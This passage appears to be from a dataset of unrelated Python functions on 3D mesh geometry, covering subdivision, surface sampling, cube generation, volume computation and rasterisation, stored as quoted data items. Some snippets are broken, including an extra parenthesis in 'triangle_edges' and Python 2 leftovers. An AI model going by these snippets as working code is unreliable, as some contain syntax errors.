mesh.give_edges().give_node(edge_index)[vertex_index]\n\t\t\t\tnew_x += 0.5*mesh.give_nodes().give_coor()[this_node][0]\n\t\t\t\tnew_y += 0.5*mesh.give_nodes().give_coor()[this_node][1]\n\t\t\t\tnew_z += 0.5*mesh.give_nodes().give_coor()[this_node][2]\n\t\t\t\t\n\t\t\tnew_coor.append((new_x, new_y, new_z))\n\t\t\t\t\n\t# 3. generate new node on interior edge\n\t# 1/16 o-------o 1/16 o: existing vertices\n\t# | | *: newly-generated vertices\n\t# 3/8 o---*---o 3/8\n\t# | |\n\t# 1/16 o-------o 1/16\n\n\t\telse:\n\t\t\tnew_x, new_y, new_z = (0., 0., 0.)\n\t\t\tconsidered_node = []\n\t\t\tfor vertex_index in range(2):\n\t\t\t\tthis_node = mesh.give_edges().give_node(edge_index)[vertex_index]\n\t\t\t\tconsidered_node.append(this_node)\n\t\t\t\tnew_x += 3./8.*mesh.give_nodes().give_coor()[this_node][0]\n\t\t\t\tnew_y += 3./8.*mesh.give_nodes().give_coor()[this_node][1]\n\t\t\t\tnew_z += 3./8.*mesh.give_nodes().give_coor()[this_node][2]\n\t\t\t\n\t\t\t# faces contain this node\n\t\t\tpotential_node = []\n\t\t\tfor face_index in edge_shared_by_faces_list[edge_index]:\t\t\n\t\t\t\tfor vertex_index in range(4):\n\t\t\t\t\t\tpotential_node.append(mesh.give_faces().give_node_list(face_index)[vertex_index])\n\t\t\t\n\t\t\touter_node = []\n\t\t\tfor node in potential_node:\n\t\t\t\tif (node not in considered_node) & (node not in outer_node):\n\t\t\t\t\touter_node.append(node)\n\t\t\t\t\t\n\t\t\tfor vertex_index in outer_node:\n\t\t\t\tnew_x += 1./16.*mesh.give_nodes().give_coor()[vertex_index][0]\n\t\t\t\tnew_y += 1./16.*mesh.give_nodes().give_coor()[vertex_index][1]\n\t\t\t\tnew_z += 1./16.*mesh.give_nodes().give_coor()[vertex_index][2]\n\t\t\t\n\t\t\tnew_coor.append((new_x, new_y, new_z))\n\n\t# update the links of edges and surfaces\n\tnew_edge_list = []\n\tnew_face_list = []\n\tfor face_index in range(mesh.give_model_inf()[2]):\n\t\told_node0 = mesh.give_faces().give_node_list(face_index)[0]\n\t\told_node1 = mesh.give_faces().give_node_list(face_index)[1]\n\t\told_node2 = mesh.give_faces().give_node_list(face_index)[2]\n\t\told_node3 = mesh.give_faces().give_node_list(face_index)[3]\n\t\t\n\t\told_edge0 = mesh.give_faces().give_edge_list(face_index)[0]\n\t\told_edge1 = mesh.give_faces().give_edge_list(face_index)[1]\n\t\told_edge2 = mesh.give_faces().give_edge_list(face_index)[2]\n\t\told_edge3 = mesh.give_faces().give_edge_list(face_index)[3]\n\t\t\n\t\tnew_node4 = old_edge0 + mesh.give_model_inf()[0] + mesh.give_model_inf()[2] \n\t\tnew_node5 = old_edge1 + mesh.give_model_inf()[0] + mesh.give_model_inf()[2]\n\t\tnew_node6 = old_edge2 + mesh.give_model_inf()[0] + mesh.give_model_inf()[2]\n\t\tnew_node7 = old_edge3 + mesh.give_model_inf()[0] + mesh.give_model_inf()[2]\t\n\t\tnew_node8 = mesh.give_model_inf()[0] + face_index\n\t\t\n\t\tif helper.in_list((old_node0, new_node4), new_edge_list) == False: \n\t\t\tnew_edge_list.append((old_node0, new_node4))\n\t\tif helper.in_list((new_node4, new_node8), new_edge_list) == False: \n\t\t\tnew_edge_list.append((new_node4, new_node8))\n\t\tif helper.in_list((new_node8, new_node7), new_edge_list) == False: \n\t\t\tnew_edge_list.append((new_node8, new_node7))\n\t\tif helper.in_list((new_node7, old_node0), new_edge_list) == False: \n\t\t\tnew_edge_list.append((new_node7, old_node0))\n\t\tif helper.in_list((new_node4, old_node1), new_edge_list) == False: \n\t\t\tnew_edge_list.append((new_node4, old_node1))\n\t\tif helper.in_list((old_node1, new_node5), new_edge_list) == False: \n\t\t\tnew_edge_list.append((old_node1, new_node5))\n\t\tif helper.in_list((new_node5, new_node8), new_edge_list) == False: \n\t\t\tnew_edge_list.append((new_node5, new_node8))\n\t\tif helper.in_list((new_node7, old_node3), new_edge_list) == False: \n\t\t\tnew_edge_list.append((new_node7, old_node3))\n\t\tif helper.in_list((old_node3, new_node6), new_edge_list) == False: \n\t\t\tnew_edge_list.append((old_node3, new_node6))\n\t\tif helper.in_list((new_node6, new_node8), new_edge_list) == False: \n\t\t\tnew_edge_list.append((new_node6, new_node8))\n\t\tif helper.in_list((new_node6, old_node2), new_edge_list) == False: \n\t\t\tnew_edge_list.append((new_node6, old_node2))\n\t\tif helper.in_list((old_node2, new_node5), new_edge_list) == False: \n\t\t\tnew_edge_list.append((old_node2, new_node5))\n\t\n\t\tnew_face_list.append((old_node0, new_node4, new_node8, new_node7))\n\t\tnew_face_list.append((new_node4, old_node1, new_node5, new_node8))\n\t\tnew_face_list.append((new_node7, new_node8, new_node6, old_node3))\n\t\tnew_face_list.append((new_node8, new_node5, old_node2, new_node6))\n\t\t\n\tnew_edges = geo.Edge(new_edge_list)\n\t\n\tnew_faces = geo.Face(new_face_list, new_edges)\n\t\t\n\t# update existing nodes\t\n\tfor node_index in range(mesh.give_model_inf()[0]):\n\t\t\n\t\tring1, ring2 = helper.find_neighbour_node(new_edges, new_faces, node_index)\n\t\tvalence = helper.find_valence(node_index, new_faces) \n\t\t#: valence: the number of faces sharing on specific edge\n\n\t# 4. update existing corner vertex\n\t# 2/4 @---* 1/4 *: newly-generated vertices\n\t# | | @: existing vertices to be updated\n\t# 1/4 *---* 0 The higher mask values on neighbouring vertices, \n\t# the more likely a square mesh will be refined into a sphere.\n\t \n\t\tif valence == 1:\n\n\t\t\tnew_x, new_y, new_z = (0, 0, 0)\n\t\t\tprint\n\t\t\tfor node_in_ring1 in ring1:\n\t\t\t\tnew_x += 1./4.*mesh.give_nodes().give_coor()[node_in_ring1][0]\n\t\t\t\tnew_y += 1./4.*mesh.give_nodes().give_coor()[node_in_ring1][1]\n\t\t\t\tnew_z += 1./4.*mesh.give_nodes().give_coor()[node_in_ring1][2]\n\n\t\t\tfor node_in_ring2 in ring2:\n\t\t\t\tnew_x += 0.*mesh.give_nodes().give_coor()[node_in_ring2][0]\n\t\t\t\tnew_y += 0.*mesh.give_nodes().give_coor()[node_in_ring2][1]\n\t\t\t\tnew_z += 0.*mesh.give_nodes().give_coor()[node_in_ring2][2]\n\t\t\t\t\n\t\t\tnew_x += 2./4.*mesh.give_nodes().give_coor()[node_index][0]\n\t\t\tnew_y += 2./4.*mesh.give_nodes().give_coor()[node_index][1]\n\t\t\tnew_z += 2./4.*mesh.give_nodes().give_coor()[node_index][2]\n\n\t# 5. update existing boundary joint vertex\n\t# 3/4\n\t# 1/8 *---*---* 1/8 *: newly-generated vertices\n\t# | | | @: existing vertices to be updated\n\t# 0 *---*---* 0\n\n\t\telif valence == 2:\n\t\t\t\n\t\t\tnew_x, new_y, new_z = (0, 0, 0)\n\t\t\tfor node_in_ring1 in ring1:\n\t\t\t\tif helper.find_valence(node_in_ring1, new_faces) <= 2: \n\t\t\t\t\tnew_x += 1./8.*mesh.give_nodes().give_coor()[node_in_ring1][0]\n\t\t\t\t\tnew_y += 1./8.*mesh.give_nodes().give_coor()[node_in_ring1][1]\n\t\t\t\t\tnew_z += 1./8.*mesh.give_nodes().give_coor()[node_in_ring1][2]\n\t\t\t\t\t\n\t\t\tnew_x += 3./4.*mesh.give_nodes().give_coor()[node_index][0]\n\t\t\tnew_y += 3./4.*mesh.give_nodes().give_coor()[node_index][1]\n\t\t\tnew_z += 3./4.*mesh.give_nodes().give_coor()[node_index][2]\n\t\n\t# 6. update new node on interior edge\n\t# * r/k\n\t# /\\ b/k*\n\t# *__/ \\___ r/k\n\t# \\ \\ /¬¬/ *: newly-generated vertices: \n\t# \\ \\/ / b = 3/2/valence, r = 1/4/valence\n\t# *--@--* b/k\t @: existing vertices to be updated: 1-b-r\t\t\n\t# / /\\ \\\n\t# /__/ \\__\\\n\t# * \\ / * r/k\n\t# \\/\n\t\t\n\t\telse:\n\t\t\tnew_x, new_y, new_z = (0, 0, 0)\n\t\t\tbeta = 3./2./valence\n\t\t\tgamma = 1./4./valence\n\t\t\tfor node_in_ring1 in ring1:\n\t\t\t\tnew_x += beta/valence*mesh.give_nodes().give_coor()[node_in_ring1][0]\n\t\t\t\tnew_y += beta/valence*mesh.give_nodes().give_coor()[node_in_ring1][1]\n\t\t\t\tnew_z += beta/valence*mesh.give_nodes().give_coor()[node_in_ring1][2]\n\t\t\t\n\t\t\tfor node_in_ring2 in ring2:\n\t\t\t\tnew_x += gamma/valence*mesh.give_nodes().give_coor()[node_in_ring2][0]\n\t\t\t\tnew_y += gamma/valence*mesh.give_nodes().give_coor()[node_in_ring2][1]\n\t\t\t\tnew_z += gamma/valence*mesh.give_nodes().give_coor()[node_in_ring2][2]\n\t\t\t\n\t\t\tnew_x += (1. - beta - gamma)*mesh.give_nodes().give_coor()[node_index][0]\n\t\t\tnew_y += (1. - beta - gamma)*mesh.give_nodes().give_coor()[node_index][1]\n\t\t\tnew_z += (1. - beta - gamma)*mesh.give_nodes().give_coor()[node_index][2]\n\t\t\n\t\tnew_coor[node_index] = (new_x, new_y, new_z)\n\t\n\tnew_nodes = geo.Node(new_coor)\n\t\n\tmesh.update(new_nodes, new_edges, new_faces)\n\t\n\t# return new_mesh\n\treturn mesh", "def get_surfaces_per_volume(my_core, entityset_ranges):\n\n s_p_v = {}\n for volumeset in entityset_ranges['Volumes']:\n s_p_v[volumeset] = my_core.get_child_meshsets(volumeset).size()\n return s_p_v", "def sample_surface(mesh, count):\n\n # len(mesh.faces) float, array of the areas\n # of each face of the mesh\n area = mesh.area_faces\n # total area (float)\n area_sum = np.sum(area)\n # cumulative area (len(mesh.faces))\n area_cum = np.cumsum(area)\n face_pick = np.random.random(count) * area_sum\n face_index = np.searchsorted(area_cum, face_pick)\n\n # pull triangles into the form of an origin + 2 vectors\n tri_origins = mesh.triangles[:, 0]\n tri_vectors = mesh.triangles[:, 1:].copy()\n tri_vectors -= np.tile(tri_origins, (1, 2)).reshape((-1, 2, 3))\n\n # pull the vectors for the faces we are going to sample from\n tri_origins = tri_origins[face_index]\n tri_vectors = tri_vectors[face_index]\n\n # randomly generate two 0-1 scalar components to multiply edge vectors by\n random_lengths = np.random.random((len(tri_vectors), 2, 1))\n\n # points will be distributed on a quadrilateral if we use 2 0-1 samples\n # if the two scalar components sum less than 1.0 the point will be\n # inside the triangle, so we find vectors longer than 1.0 and\n # transform them to be inside the triangle\n random_test = random_lengths.sum(axis=1).reshape(-1) > 1.0\n random_lengths[random_test] -= 1.0\n random_lengths = np.abs(random_lengths)\n\n # multiply triangle edge vectors by the random lengths and sum\n sample_vector = (tri_vectors * random_lengths).sum(axis=1)\n\n # finally, offset by the origin to generate\n # (n,3) points in space on the triangle\n samples = sample_vector + tri_origins\n\n return samples, face_index", "def surfaces(self):\n return self._surfaces", "def facets(self) -> list[Polytope]:\n first_polygon_index = self.rank - max(self.pdim - 1, 1) - 1\n slices = (slice(None),) * first_polygon_index\n return [self._cast_polytope(self[slices + (i,)], self.pdim - 1) for i in range(self.shape[first_polygon_index])]", "def _get_surfaces(idf):\n surface_types = [\n 'BUILDINGSURFACE:DETAILED',\n 'FENESTRATIONSURFACE:DETAILED',\n ]\n surfaces = []\n for surface_type in surface_types:\n surfaces.extend(idf.idfobjects[surface_type])\n\n return surfaces", "def _vertices(self, point):\n vertex_0, vertex_1, vertex_2 = tuple(\n gs.take(point, indices=self.faces[:, i], axis=-2) for i in range(3)\n )\n if point.ndim == 3 and vertex_0.ndim == 2:\n vertex_0 = gs.expand_dims(vertex_0, axis=0)\n vertex_1 = gs.expand_dims(vertex_1, axis=0)\n vertex_2 = gs.expand_dims(vertex_2, axis=0)\n return vertex_0, vertex_1, vertex_2", "def get_vertex_data(\n mesh: object,\n g: BinaryReader,\n v1: int,\n v2: int,\n v3: int,\n v4: int,\n n: int,\n verbose=False,\n):\n for i in range(v1):\n v_offset = g.tell()\n mesh.vertPosList.append(g.f(3))\n mesh.vertNormList.append(g.f(3))\n indice_offset = g.tell()\n if verbose:\n logger.debug({\n \"v1 v_offset\": v_offset,\n \"v1 indice_offset\": indice_offset,\n })\n mesh.skinIndiceList.append(g.B(4))\n mesh.skinWeightList.append([0, 0, 0, 1])\n\n for i in range(v2):\n v_offset = g.tell()\n mesh.vertPosList.append(g.f(3))\n mesh.vertNormList.append(g.f(3))\n indice_offset = g.tell()\n if verbose:\n logger.debug({\n \"v2 v_offset\": v_offset,\n \"v2 indice_offset\": indice_offset,\n })\n mesh.skinIndiceList.append(g.B(4))\n w1 = g.f(1)[0]\n w2 = 1.0 - w1\n mesh.skinWeightList.append([0, 0, w2, w1])\n\n for i in range(v3):\n v_offset = g.tell()\n mesh.vertPosList.append(g.f(3))\n mesh.vertNormList.append(g.f(3))\n indice_offset = g.tell()\n if verbose:\n logger.debug({\n \"v3 v_offset\": v_offset,\n \"v3 indice_offset\": indice_offset,\n })\n mesh.skinIndiceList.append(g.B(4))\n w1 = g.f(1)[0]\n w2 = g.f(1)[0]\n w3 = 1.0 - w1 - w2\n mesh.skinWeightList.append([0, w3, w2, w1])\n\n for i in range(v4):\n v_offset = g.tell()\n mesh.vertPosList.append(g.f(3))\n mesh.vertNormList.append(g.f(3))\n indice_offset = g.tell()\n if verbose:\n logger.debug({\n \"v4 v_offset\": v_offset,\n \"v4 indice_offset\": indice_offset,\n })\n mesh.skinIndiceList.append(g.B(4))\n w1 = g.f(1)[0]\n w2 = g.f(1)[0]\n w3 = g.f(1)[0]\n w4 = 1.0 - w1 - w2 - w3\n mesh.skinWeightList.append([w4, w3, w2, w1])", "def _triangular_mesh_to_three_geometry(vertices, faces, vertex_colors=None):\n context = _js_builder.Js(mode=_js_builder.PERSISTENT)\n vertices = context.Float32Array.new_object(vertices.ravel().tolist())\n faces = context.Uint32Array.new_object(faces.ravel().tolist())\n geometry = context.THREE.BufferGeometry.new_object()\n geometry.addAttribute('position',\n context.THREE.BufferAttribute.new_object(vertices, 3))\n geometry.setIndex(context.THREE.BufferAttribute.new_object(faces, 1))\n geometry.computeVertexNormals()\n if vertex_colors is not None:\n vertex_colors = context.Float32Array.new_object(\n vertex_colors.ravel().tolist())\n geometry.addAttribute(\n 'color', context.THREE.BufferAttribute.new_object(vertex_colors, 3))\n\n return geometry", "def create_cube(scale=(1.0,1.0,1.0), st=False, rgba=False, dtype='float32', type='triangles'):\n\n shape = [24, 3]\n rgba_offset = 3\n\n width, height, depth = scale\n # half the dimensions\n width /= 2.0\n height /= 2.0\n depth /= 2.0\n\n vertices = np.array([\n # front\n # top right\n ( width, height, depth,),\n # top left\n (-width, height, depth,),\n # bottom left\n (-width,-height, depth,),\n # bottom right\n ( width,-height, depth,),\n\n # right\n # top right\n ( width, height,-depth),\n # top left\n ( width, height, depth),\n # bottom left\n ( width,-height, depth),\n # bottom right\n ( width,-height,-depth),\n\n # back\n # top right\n (-width, height,-depth),\n # top left\n ( width, height,-depth),\n # bottom left\n ( width,-height,-depth),\n # bottom right\n (-width,-height,-depth),\n\n # left\n # top right\n (-width, height, depth),\n # top left\n (-width, height,-depth),\n # bottom left\n (-width,-height,-depth),\n # bottom right\n (-width,-height, depth),\n\n # top\n # top right\n ( width, height,-depth),\n # top left\n (-width, height,-depth),\n # bottom left\n (-width, height, depth),\n # bottom right\n ( width, height, depth),\n\n # bottom\n # top right\n ( width,-height, depth),\n # top left\n (-width,-height, depth),\n # bottom left\n (-width,-height,-depth),\n # bottom right\n ( width,-height,-depth),\n ], dtype=dtype)\n\n st_values = None\n rgba_values = None\n\n if st:\n # default st values\n st_values = np.tile(\n np.array([\n (1.0, 1.0,),\n (0.0, 1.0,),\n (0.0, 0.0,),\n (1.0, 0.0,),\n ], dtype=dtype),\n (6,1,)\n )\n\n if isinstance(st, bool):\n pass\n elif isinstance(st, (int, float)):\n st_values *= st\n elif isinstance(st, (list, tuple, np.ndarray)):\n st = np.array(st, dtype=dtype)\n if st.shape == (2,2,):\n # min / max\n st_values *= st[1] - st[0]\n st_values += st[0]\n elif st.shape == (4,2,):\n # per face st values specified manually\n st_values[:] = np.tile(st, (6,1,))\n elif st.shape == (6,2,):\n # st values specified manually\n st_values[:] = st\n else:\n raise ValueError('Invalid shape for st')\n else:\n raise ValueError('Invalid value for st')\n\n shape[-1] += st_values.shape[-1]\n rgba_offset += st_values.shape[-1]\n\n if rgba:\n # default rgba values\n rgba_values = np.tile(np.array([1.0, 1.0, 1.0, 1.0], dtype=dtype), (24,1,))\n\n if isinstance(rgba, bool):\n pass\n elif isinstance(rgba, (int, float)):\n # int / float expands to RGBA with all values == value\n rgba_values *= rgba \n elif isinstance(rgba, (list, tuple, np.ndarray)):\n rgba = np.array(rgba, dtype=dtype)\n\n if rgba.shape == (3,):\n rgba_values = np.tile(rgba, (24,1,))\n elif rgba.shape == (4,):\n rgba_values[:] = np.tile(rgba, (24,1,))\n elif rgba.shape == (4,3,):\n rgba_values = np.tile(rgba, (6,1,))\n elif rgba.shape == (4,4,):\n rgba_values = np.tile(rgba, (6,1,))\n elif rgba.shape == (6,3,):\n rgba_values = np.repeat(rgba, 4, axis=0)\n elif rgba.shape == (6,4,):\n rgba_values = np.repeat(rgba, 4, axis=0)\n elif rgba.shape == (24,3,):\n rgba_values = rgba\n elif rgba.shape == (24,4,):\n rgba_values = rgba\n else:\n raise ValueError('Invalid shape for rgba')\n else:\n raise ValueError('Invalid value for rgba')\n\n shape[-1] += rgba_values.shape[-1]\n\n data = np.empty(shape, dtype=dtype)\n data[:,:3] = vertices\n if st_values is not None:\n data[:,3:5] = st_values\n if rgba_values is not None:\n data[:,rgba_offset:] = rgba_values\n\n if type == 'triangles':\n # counter clockwise\n # top right -> top left -> bottom left\n # top right -> bottom left -> bottom right\n indices = np.tile(np.array([0, 1, 2, 0, 2, 3], dtype='int'), (6,1))\n for face in range(6):\n indices[face] += (face * 4)\n indices.shape = (-1,)\n elif type == 'triangle_strip':\n raise NotImplementedError\n elif type == 'triangle_fan':\n raise NotImplementedError\n elif type == 'quads':\n raise NotImplementedError\n elif type == 'quad_strip':\n raise NotImplementedError\n else:\n raise ValueError('Unknown type')\n\n return data, indices", "def triangle_edges(length=2.0, divisions=4)):\n\n def _edges_from_triangle(triangle):\n a, b, c = triangle\n return [(a, b), (b, c), (c, a)]\n\n vertices, facets = triangle_facets(length, divisions)\n edges = []\n for facet in facets:\n edges.extend(_edges_from_triangle(facet))\n return vertices, edges", "def Volumes(self, with_sign=False, gpoints=None):\n\n assert self.elements is not None\n assert self.element_type is not None\n\n if self.points.shape[1] == 2:\n raise ValueError(\"2D mesh does not have volume\")\n if gpoints is None:\n assert self.points is not None\n gpoints = self.points\n\n if self.element_type == \"tet\":\n\n a = gpoints[self.elements[:,0],:]\n b = gpoints[self.elements[:,1],:]\n c = gpoints[self.elements[:,2],:]\n d = gpoints[self.elements[:,3],:]\n\n det_array = np.dstack((a-d,b-d,c-d))\n # FIND VOLUME OF ALL THE ELEMENTS\n volume = 1./6.*np.linalg.det(det_array)\n\n elif self.element_type == \"hex\":\n\n # Refer: https://en.wikipedia.org/wiki/Parallelepiped\n\n a = gpoints[self.elements[:,0],:]\n b = gpoints[self.elements[:,1],:]\n c = gpoints[self.elements[:,3],:]\n d = gpoints[self.elements[:,4],:]\n\n det_array = np.dstack((b-a,c-a,d-a))\n # FIND VOLUME OF ALL THE ELEMENTS\n volume = np.linalg.det(det_array)\n\n else:\n raise NotImplementedError(\"Computing volumes for\", self.element_type, \"elements not implemented yet\")\n\n if with_sign is False:\n volume = np.abs(volume)\n\n return volume", "def get_edges(triangles: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:\n edges = np.concatenate([triangles[:, e] for e in [(0, 1), (1, 2), (2, 0)]])\n edges = np.sort(edges, axis=1)\n edges, counts = np.unique(edges, return_counts=True, axis=0)\n return edges, counts == 1", "def ConvertTrisToQuads(self):\n\n self.__do_essential_memebers_exist__()\n if self.element_type == \"quad\":\n return\n assert self.element_type == \"tri\"\n if self.IsHighOrder:\n raise ValueError('High order triangular elements cannot be converted to low/high order quads')\n\n tconv = time()\n\n # SPLIT THE TRIANGLE INTO 3 QUADS BY CONNECTING THE\n # MEDIAN AND MIDPOINTS OF THE TRIANGLE\n\n # FIND MEDIAN OF TRIANGLES\n # median = self.Median()\n median = np.sum(self.points[self.elements,:],axis=1)/self.elements.shape[1]\n # FIND EDGE MIDPOINTS OF TRIANGLES\n mid0 = np.sum(self.points[self.elements[:,:2],:],axis=1)/2.\n mid1 = np.sum(self.points[self.elements[:,[1,2]],:],axis=1)/2.\n mid2 = np.sum(self.points[self.elements[:,[2,0]],:],axis=1)/2.\n\n # STABLE APPROACH\n # points = np.zeros((1,2))\n # for elem in range(self.nelem):\n # quad0 = np.concatenate((self.points[self.elements[elem,0],:][None,:],mid0[elem,:][None,:],\n # median[elem,:][None,:],mid2[elem,:][None,:]),axis=0)\n # quad1 = np.concatenate((self.points[self.elements[elem,1],:][None,:],mid1[elem,:][None,:],\n # median[elem,:][None,:],mid0[elem,:][None,:]),axis=0)\n # quad2 = np.concatenate((self.points[self.elements[elem,2],:][None,:],mid2[elem,:][None,:],\n # median[elem,:][None,:],mid1[elem,:][None,:]),axis=0)\n # points = np.concatenate((points,quad0,quad1,quad2))\n # points = points[1:,:]\n\n points = np.zeros((3*self.nelem*4,2))\n points[::3*4,:] = self.points[self.elements[:,0],:]\n points[1::3*4,:] = mid0\n points[2::3*4,:] = median\n points[3::3*4,:] = mid2\n\n points[4::3*4,:] = self.points[self.elements[:,1],:]\n points[5::3*4,:] = mid1\n points[6::3*4,:] = median\n points[7::3*4,:] = mid0\n\n points[8::3*4,:] = self.points[self.elements[:,2],:]\n points[9::3*4,:] = mid2\n points[10::3*4,:] = median\n points[11::3*4,:] = mid1\n\n\n # KEEP ZEROFY ON, OTHERWISE YOU GET STRANGE BEHVAIOUR\n Decimals = 10\n rounded_points = points.copy()\n makezero(rounded_points)\n rounded_repoints = np.round(rounded_points,decimals=Decimals)\n points, idx_points, inv_points = unique2d(rounded_points,order=False,\n consider_sort=False,return_index=True,return_inverse=True)\n\n elements = np.arange(points.shape[0])[inv_points].reshape(3*self.nelem,4)\n\n self.__reset__()\n\n self.element_type = \"quad\"\n self.elements = elements\n self.points = points\n self.nelem = self.elements.shape[0]\n self.nnode = self.points.shape[0]\n self.GetBoundaryEdgesQuad()\n\n print(\"Triangular to quadrilateral mesh conversion took\", time() - tconv, \"seconds\")", "def polyhedra_from_xyz(xyz_file: str,\n try_convex_hull: bool = True)\\\n -> Tuple[List[Polyhedron],\\\n List[VertexCollection],\\\n List[Union[Polyhedron,VertexCollection]]]:\n\n object_coordinates_dict: Dict[str, List[List[float]]] = {}\n polyhedron_list: List[Polyhedron] = []\n vertex_collection_list: List[VertexCollection] = []\n object_list: List[Union[Polyhedron,VertexCollection]] = []\n type_order: List[str] = []\n with open(xyz_file, 'r') as f:\n lines = f.readlines()\n for i in range(len(lines)):\n line = lines[i].strip()\n if i == 0:\n l = re.search(\"\\d+$\", line)\n assert l is not None\n n_points = int(l.group())\n elif i == 1:\n l = re.search(\"\\d+$\", line)\n assert l is not None\n dim = int(l.group())\n assert dim <= 3, 'We cannot visualise the fourth dimension and\\\n above.'\n else:\n if line == '':\n continue\n l = re.search(\"([A-Za-z]+[0-9]*)[\\s\\t]+\", line)\n assert l is not None\n point_type = l.group(1)\n l2 = re.findall(\"[+-]?\\d+\\.\\d*\", line)\n point_coordinates = []\n for coordinate in l2:\n point_coordinates.append(float(coordinate))\n assert len(point_coordinates) == dim\n if point_type not in object_coordinates_dict:\n object_coordinates_dict[point_type] = []\n object_coordinates_dict[point_type].append(point_coordinates)\n if point_type not in type_order:\n type_order.append(point_type)\n\n for point_type in type_order:\n object_coordinates = np.array(object_coordinates_dict[point_type])\n if try_convex_hull:\n try:\n print(\"Attempting to construct a convex hull for {}...\"\\\n .format(point_type))\n polyhedron = construct_convex_hull_from_coords\\\n (object_coordinates)\n polyhedron_list.append(polyhedron)\n object_list.append(polyhedron) \n except:\n print(\"Failed to construct a convex hull for {}.\"\\\n .format(point_type))\n print(\"Falling back to vertex collection for {}...\"\\\n .format(point_type))\n vertex_collection = construct_vertex_collection_from_coords\\\n (object_coordinates, 2)\n vertex_collection_list.append(vertex_collection)\n object_list.append(vertex_collection) \n else:\n print(\"Constructing a vertex collection for {}...\"\\\n .format(point_type))\n vertex_collection = construct_vertex_collection_from_coords\\\n (object_coordinates, 2)\n vertex_collection_list.append(vertex_collection)\n object_list.append(vertex_collection) \n\n return polyhedron_list,vertex_collection_list,object_list", "def triangle(p1, p2, p3, width, height):\r\n v1 = vec2(round(p1.x), round(p1.y))\r\n v2 = vec2(round(p2.x), round(p2.y))\r\n v3 = vec2(round(p3.x), round(p3.y))\r\n if (v1.y > v2.y):\r\n temp = v1\r\n v1 = v2\r\n v2 = temp\r\n if (v1.y > v3.y):\r\n temp = v1\r\n v1 = v3\r\n v3 = temp\r\n if (v2.y > v3.y):\r\n temp = v2\r\n v2 = v3\r\n v3 = temp\r\n if (v1.y != v2.y): k_12 = (v2.x - v1.x)/(v2.y - v1.y)\r\n if (v1.y != v3.y): k_13 = (v3.x - v1.x)/(v3.y - v1.y)\r\n if (v2.y != v3.y): k_23 = (v3.x - v2.x)/(v3.y - v2.y)\r\n if (v1.y == v2.y):\r\n if (v1.x < v2.x):\r\n xl, xu = v1.x, v2.x\r\n left = False\r\n else:\r\n xl, xu = v2.x, v1.x\r\n left = True\r\n if (v1.y >= 0 and v1.y < height):\r\n xl = max(xl, 0)\r\n xu = min(xu, width - 1)\r\n for x in range(xl, xu + 1):\r\n yield vec2(x, v1.y)\r\n else:\r\n left = v2.x < k_13*(v2.y - v1.y) + v1.x\r\n if (left):\r\n k1, k2 = k_12, k_13\r\n else:\r\n k1, k2 = k_13, k_12\r\n yl = max(v1.y, 0)\r\n yu = min(v2.y, height)\r\n for y in range(yl, yu):\r\n xl = max(math.floor(k1*(y - v1.y) + v1.x + 0.5), 0)\r\n xu = min(math.floor(k2*(y - v1.y) + v1.x + 0.5), width - 1)\r\n for x in range(xl, xu + 1):\r\n yield vec2(x, y)\r\n if (v2.y == v3.y):\r\n if (v2.x < v3.x):\r\n xl, xu = v2.x, v3.x\r\n else:\r\n xl, xu = v3.x, v2.x\r\n if (v2.y >= 0 and v2.y < height):\r\n xl = max(xl, 0)\r\n xu = min(xu, width - 1)\r\n for x in range(xl, xu + 1):\r\n yield vec2(x, v2.y)\r\n else:\r\n if (left):\r\n k1, k2 = k_23, k_13\r\n t1, t2 = v2, v1\r\n else:\r\n k1, k2 = k_13, k_23\r\n t1, t2 = v1, v2\r\n yl = max(v2.y, 0)\r\n yu = min(v3.y + 1, height)\r\n for y in range(yl, yu):\r\n xl = max(math.floor(k1*(y - t1.y) + t1.x + 0.5), 0)\r\n xu = min(math.floor(k2*(y - t2.y) + t2.x + 0.5), width - 1)\r\n for x in range(xl, xu + 1):\r\n yield vec2(x, y)", "def surface_mask(self):\n return np.vectorize(lambda name: name in self.nvertices.keys())(self.name)", "def face_normals(xyz, triangles):\n\n\tabc_xyz = face_attr(xyz, triangles)\n\n\tbc_xyz = abc_xyz[:,:,1:3] - abc_xyz[:,:,0:1]\n\tfn = tf.linalg.cross(bc_xyz[:,:,0], bc_xyz[:,:,1])\n\tfn = tf.math.l2_normalize(fn, -1)\n\treturn fn", "def surface(*args, degreeU: int=0, degreeV: int=0, formU: AnyStr=\"\", formV: AnyStr=\"\", knotU:\n Union[float, List[float]]=0.0, knotV: Union[float, List[float]]=0.0, name:\n AnyStr=\"\", objectSpace: bool=True, point: Union[List[float, float, float],\n List[List[float, float, float]]]=None, pointWeight: Union[List[float, float, float,\n float], List[List[float, float, float, float]]]=None, worldSpace: bool=True,\n **kwargs)->AnyStr:\n pass", "def DisplayMesh():\r\n \r\n # Load Surface Mesh Data and generate normals\r\n VTKString = OpenData('C:/Users/Tim/Documents/University/Year 4/Final Project/FinalYearProjectCode/TEH_Code/InputFiles','muscle_surface.vtk')\r\n header, Vertices, Triangles = CreateMatrixVTK(VTKString)\r\n \r\n fig = plt.figure()\r\n ax1 = fig.add_subplot(111,projection = '3d')\r\n ax1.plot_trisurf(Vertices[:,0],Vertices[:,1],Vertices[:,2],triangles= Triangles[:,1:])\r\n ax1.set_zlabel('z')\r\n ax1.set_ylabel('y')\r\n ax1.set_xlabel('x')\r\n plt.show()", "def triangulate_ngons(bm):\n triangulate = []\n for face in bm.faces:\n if len(face.verts) > 4:\n triangulate.append(face)\n if triangulate:\n bmesh.ops.triangulate(bm, faces=triangulate,\n quad_method=0, ngon_method=0)\n return len(triangulate)", "def _tvb_surface_to_tri(self, surface_file_name):\n surface_file_path = os.path.join(OM_STORAGE_DIR, surface_file_name)\n\n #TODO: check file doesn't already exist\n LOG.info(\"Writing TVB surface to .tri file: %s\" % surface_file_path)\n file_handle = file(surface_file_path, \"a\")\n\n file_handle.write(\"- %d \\n\" % self.sources.number_of_vertices)\n verts_norms = numpy.hstack((self.sources.vertices, \n self.sources.vertex_normals))\n numpy.savetxt(file_handle, verts_norms)\n\n tri_str = \"- \" + (3 * (str(self.sources.number_of_triangles) + \" \")) + \"\\n\"\n file_handle.write(tri_str)\n numpy.savetxt(file_handle, self.sources.triangles, fmt=\"%d\")\n\n file_handle.close()\n LOG.info(\"%s written successfully.\" % surface_file_name)\n\n return surface_file_path", "def list_plot3d_tuples(v, interpolation_type, texture, **kwds):\n from matplotlib import tri, delaunay\n import numpy\n import scipy\n from random import random\n from scipy import interpolate\n from .plot3d import plot3d\n\n if len(v)<3:\n raise ValueError(\"We need at least 3 points to perform the interpolation\")\n\n 